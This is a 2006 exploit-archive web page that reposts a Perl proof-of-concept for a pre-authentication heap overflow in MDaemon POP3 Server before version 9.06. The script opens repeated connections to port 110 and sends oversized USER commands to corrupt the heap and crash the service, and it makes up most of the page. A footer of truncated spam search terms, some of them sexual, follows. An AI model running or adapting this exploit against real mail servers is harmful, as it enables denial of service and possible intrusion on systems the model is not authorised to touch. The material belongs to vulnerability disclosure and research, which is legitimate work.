about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , MDaemon POP3 Server < 9.06 (USER) Remote Buffer Overflow PoC




2006-08-22 MDaemon POP3 Server < 9.06 (USER) Remote Buffer Overflow PoC 
Rated as : Critical

#
# PoC for Mdaemon POP3 preauth heap overflow
#
# Coded by Leon Juranic <leon.juranic@infigo.hr>
# Infigo IS <http://www.infigo.hr>
# 
#

$host = '192.168.0.105';

use IO::Socket;

for ($x = 0 ; $x < 12 ; $x++)
{
	$sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110',
Proto => 'tcp') 
	|| die "socket error\n\n";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "USER " . "\@A" x 160 .
"\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "QUIT\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	close ($sock);
	sleep(1);
}
	$sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110',
Proto => 'tcp') 
	|| die "socket error\n\n";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "USER " . "\@A\@A" . "B" x 326
. "\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "USER " . "\'A" x  337 .
"\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	sleep(2);
securitydot.net - 2006-08-22

Advertising

Copyright 2007, SecurityDot
Sun, 23 Nov 2008 10:36:30 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
WWW.kamasu Www.vipsex t978t Sex in zoo play fucki www.sexywo boomika se Www.vipsex Fotoartisb t98t sexymove. www.cmd55. webalizer WEBrick ht Vulnerabil SSH-1.99 sexy peopl joomla com hotsexasia dadan first porn 200 /compo phpBB 3.0. VGallery vidio seks news for c nauto sex MS Termina Red Hat En Sexvedo Free fuck. FAMILYSEX Www.bollyw www.saxy.g components sxs300 www.videos all music www.freese myalbum xo Www.Sexsyc naruto sex vidieo sex BBN IAD 2.0.5 t453t t303t www.iran_e fuking gir arabvideos